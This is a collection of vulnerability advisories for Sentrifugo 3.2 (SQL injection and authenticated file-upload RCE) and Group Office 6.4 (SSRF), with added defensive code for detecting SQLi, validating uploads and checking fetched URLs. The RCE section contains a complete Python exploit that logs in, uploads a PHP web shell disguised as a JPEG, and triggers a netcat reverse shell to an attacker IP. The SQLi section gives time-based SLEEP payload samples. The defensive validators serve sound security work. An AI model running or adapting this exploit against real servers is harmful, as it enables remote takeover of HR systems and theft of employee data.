Sentrifugo Version 3.2 –> SQLi [employeeNumId] parameter | CVE-2020-26805

Software: https://sourceforge.net/projects/sentrifugo/
Version: 3.2
Vulnerability: SQL Injection
CVE: CVE-2020-26805

Sentrifugo is a FREE and powerful Human Resource Management System that can be easily configured to meet your organizational needs… Sentrifugo makes your organization’s HR process easier. It is packed with HR essential modules like Appraisal, Time Management, Leave Management, Employee Management, Analytics, Hiring/Recruitment, Background Check, Service Desk and much more. Sentrifugo furnishes a complete HRM solution facilitating a strategic and comprehensive approach to manage people and the workplace, thus enabling the employee(s) to contribute effectively and productively towards the organization’s goals. Sentrifugo is the only solution you’ll need for managing HR processes. It offers a host of adaptable features to meet the needs of both managers and employees.
Reference:  https://sourceforge.net/projects/sentrifugo/

Vulnerability Description:

In the Sentrifugo web application, an admin can edit an employee’s information via the endpoint –> sentrifugo/index.php/empadditionaldetails/edit/userid/2. In this POST request, the employeeNumId parameter is vulnerable to SQL injection. An attacker can inject SQL commands into the query and read data from, or write data to, the database. If you send the request below, the response arrives roughly 5 seconds later because of the injected SLEEP command.

POST /sentrifugo/index.php/employee/edit/id/2 HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 421
Origin: http://192.168.1.6
Connection: close
Referer: http://192.168.1.6/sentrifugo/index.php/employee/edit/id/2
Cookie: PHPSESSID=4p9aptkj3tg0kp675mtaf9d02v
Upgrade-Insecure-Requests: 1
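For defenders, the practical question is how to spot this kind of time-based injection against employeeNumId in proxy or WAF exports. The following detector is an added example, not part of the advisory: it parses urlencoded POST bodies, flags SQL fragments in the employeeNumId field, and corroborates time-based payloads with the observed response time. The request records and timings are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed request records in the shape of a proxy/WAF export:
# path, urlencoded body and observed response time. Sample values only.
SAMPLE_REQUESTS = [
    {"path": "/sentrifugo/index.php/employee/edit/id/2",
     "body": "employeeNumId=EMP0042&firstname=Alice", "response_ms": 180},
    {"path": "/sentrifugo/index.php/employee/edit/id/2",
     "body": "employeeNumId=EMP0042%27+AND+SLEEP%285%29--+-&firstname=Alice",
     "response_ms": 5210},
    {"path": "/sentrifugo/index.php/employee/edit/id/2",
     "body": "employeeNumId=EMP0042%27+AND+%28SELECT+1+FROM+users%29%3D1--+&firstname=Bob",
     "response_ms": 190},
    {"path": "/sentrifugo/index.php/employee/edit/id/3",
     "body": "employeeNumId=EMP0043&firstname=O%27Brien", "response_ms": 150},
]

# SQL fragments that never belong in an employee number field.
SQLI_PATTERNS = [
    re.compile(r"\bsleep\s*\(", re.I),       # MySQL time-based blind
    re.compile(r"\bbenchmark\s*\(", re.I),   # time-based alternative
    re.compile(r"\bunion\b.+\bselect\b", re.I),
    re.compile(r"\bselect\b.+\bfrom\b", re.I),
    re.compile(r"'\s*(and|or)\b", re.I),     # closing quote followed by a boolean
    re.compile(r"--\s|#|/\*"),               # comment terminators
]

SLOW_MS = 4000  # SLEEP(5) adds ~5 s; a normal edit finishes well under this

def field_values(body, name):
    """Return all decoded values of one urlencoded form field."""
    return parse_qs(body, keep_blank_values=True).get(name, [])

def classify(record, field="employeeNumId"):
    """Return the reasons a record looks like SQLi against `field` ([] if clean)."""
    reasons = []
    for value in field_values(record["body"], field):
        text = unquote_plus(value)  # second decode catches double-encoded payloads
        hits = [p.pattern for p in SQLI_PATTERNS if p.search(text)]
        if hits:
            reasons.append("sqli-signature:" + ",".join(hits))
        # A slow response plus a timing function is high-confidence evidence
        if record["response_ms"] >= SLOW_MS and re.search(r"sleep|benchmark", text, re.I):
            reasons.append("time-based:confirmed")
    return reasons

def scan(records):
    """Map the index of each suspicious record to its reasons."""
    findings = {}
    for i, rec in enumerate(records):
        reasons = classify(rec)
        if reasons:
            findings[i] = reasons
    return findings
```

The apostrophe in a legitimate name such as O’Brien is not flagged, because the patterns require a SQL keyword or comment sequence after the quote rather than the quote alone.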

Sentrifugo Version 3.2 –> RCE [Authenticated] (assets) | CVE-2020-26803

Software: https://sourceforge.net/projects/sentrifugo/
Version: 3.2
Vulnerability: Unrestricted File Upload
CVE: CVE-2020-26803
Exploit-DB: https://www.exploit-db.com/exploits/48997
Reference:  https://sourceforge.net/projects/sentrifugo/

Vulnerability Description:

In the Sentrifugo web application, users can upload an image under the “Assets -> Add” tab. This “Upload Images” functionality is affected by an “Unrestricted File Upload” vulnerability, so an attacker can upload malicious files through it and take control of the server.

I wrote an exploit to demonstrate the vulnerability. You need to change the hardcoded values before running the exploit.

Exploit:

import requests
from bs4 import BeautifulSoup
from ast import literal_eval

'''You should change the below hardcoded inputs to get a reverse shell.'''

login_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/index/loginpopupsave"
upload_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/assets/assets/uploadsave"
call_shell = "http://XXX.XXX.XXX.XXX/sentrifugo/public/uploads/assets_images_temp/"
username = "xxxx"
password = "xxxx"

attacker_ip = "XXX.XXX.XXX.XXX"
listener_port = "4444"

# Set proxy for debugging purposes
proxy = {"http": "http://XXX.XXX.XXX.XXX:8080"}

# Log in to the system
session = requests.Session()
request = session.get(login_url)
body = {"username": username, "password": password}
# session.post(login_url, data=body, proxies=proxy)
session.post(login_url, data=body)  # Send a request without proxy
print("Logged in to the application..")

# Upload the PHP shell
files = [
    ('myfile',
        ('shell.php',
         '<?php system(\'nc.traditional {} {} -e /bin/bash\'); ?>'.format(attacker_ip, listener_port),
         'image/jpeg')
    )
]
# r = session.post(upload_url, files=files, proxies=proxy)
r = session.post(upload_url, files=files)  # Send a request without proxy
response = r.content
dict_str = response.decode("UTF-8")
response = literal_eval(dict_str)  # Convert the response text to a dictionary
filename = response["filedata"]["new_name"]
url = call_shell + filename
print("PHP file is uploaded --> {}".format(url))

# Trigger the shell
session.get(url)
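The exploit above works because the upload handler trusts the client-supplied name and Content-Type. The validator below is an added example (not Sentrifugo code) of the server-side checks that would have rejected it: an extension allow-list, a magic-byte check that the content matches the extension, a scan for embedded script markers, and a server-generated filename. The sample uploads are constructed.

```python
import os
import secrets

# Constructed sample uploads: (client filename, declared Content-Type, content bytes)
JPEG_MAGIC = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
SAMPLES = {
    "real_jpeg": ("photo.jpg", "image/jpeg", JPEG_MAGIC + b"\x00" * 32),
    "real_png": ("logo.PNG", "image/png", PNG_MAGIC + b"\x00" * 32),
    # The trick used by the advisory's exploit: PHP source, .php name, image/jpeg type
    "php_as_jpeg": ("shell.php", "image/jpeg", b"<?php system($_GET['c']); ?>"),
    # Polyglot: valid JPEG header with PHP appended and an image extension
    "polyglot": ("shell.jpg", "image/jpeg", JPEG_MAGIC + b"<?php echo 1; ?>"),
    # Double extension: harmless once the server picks the name and extension itself
    "double_ext": ("shell.php.jpg", "image/jpeg", JPEG_MAGIC + b"\x00" * 32),
}

# Allowed extension -> magic bytes the content must start with
ALLOWED = {
    ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff",
    ".png": PNG_MAGIC, ".gif": b"GIF8",
}

def validate_image_upload(client_name, declared_type, data):
    """Return (accepted, reason_or_new_name).

    declared_type is deliberately ignored: the client controls it, so it is
    never evidence of anything. Only the content and the final extension count.
    """
    ext = os.path.splitext(client_name)[1].lower()
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    if b"<?" in data or b"<script" in data.lower():
        return False, "embedded script markers"
    # Server-generated name: the client name never reaches the filesystem.
    # Store the file outside the web root (or with script execution disabled).
    return True, secrets.token_hex(16) + ext

def validate_all(samples=SAMPLES):
    """Run every sample through the validator; returns name -> accepted flag."""
    return {name: validate_image_upload(*args)[0] for name, args in samples.items()}
```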

Group Office CRM | SSRF

Software: https://sourceforge.net/projects/group-office/

Version: 6.4.196

Vulnerability: SSRF

CVE: N/A

Description of the product:

Group Office is an open source groupware application. It makes your daily office tasks easier. Share projects, calendars, files and e-mail online. It is a complete solution for all your online office needs. From a customer phone call to a project and finally an invoice. The support system helps to keep your customers happy.

Group Office is fast, secure and has privacy by design. You can stay in full control of your data by self hosting your cloud and e-mail.

Our document editing solution keeps all data on the secured server instead of synchronising it to all user devices.

GroupOffice is open source and modular, which means it’s easy to customise and extend. You can turn features on and off, and any developer can create new modules for the platform.

Description of the vulnerability:

A Server-Side Request Forgery (SSRF) vulnerability in the “set image from url” feature allows a remote attacker to forge GET requests to arbitrary URLs.
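A feature that fetches a user-supplied image URL needs the destination validated before the request is made. The check below is an added example, not Group Office code: it allows only http/https on standard ports, resolves the host, and refuses any address that is not public, including the case where one of several DNS answers is internal. The resolver table and addresses are constructed so the example runs offline; the real_resolve helper shows how a deployment would plug in DNS.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed resolver table standing in for DNS. The "public" address is a
# sample value; documentation ranges (e.g. 203.0.113.0/24) are deliberately
# avoided because ipaddress does not treat them as global.
FAKE_DNS = {
    "images.example.com": ["93.184.216.34"],
    "internal.corp.example": ["10.0.0.5"],
    "rebind.example.net": ["93.184.216.34", "127.0.0.1"],  # one public, one loopback
}

def fake_resolve(host):
    return FAKE_DNS.get(host, [])

def real_resolve(host):
    """Production resolver: every A/AAAA answer for the host."""
    return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})

def check_image_url(url, resolve=fake_resolve):
    """Return (allowed, reason_or_pinned_ip) for a 'set image from url' value."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if not parts.hostname:
        return False, "no host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        if parts.port not in (None, 80, 443):
            return False, "port not allowed"
    except ValueError:
        return False, "bad port"
    try:
        addrs = [ipaddress.ip_address(parts.hostname)]  # IP literal, no DNS needed
    except ValueError:
        resolved = resolve(parts.hostname)
        if not resolved:
            return False, "unresolvable host"
        addrs = [ipaddress.ip_address(a) for a in resolved]
    for a in addrs:
        if a.version == 6 and a.ipv4_mapped:   # ::ffff:127.0.0.1 is still loopback
            a = a.ipv4_mapped
        if not a.is_global:                     # private, loopback, link-local, CGNAT, ...
            return False, "resolves to non-public address %s" % a
    # Return the address to connect to, so the fetch uses the checked IP rather
    # than resolving a second time (defeats DNS rebinding between check and use).
    return True, str(addrs[0])
```

The fetch that follows must also re-run this check on every redirect target, since a public host can 302 to an internal one.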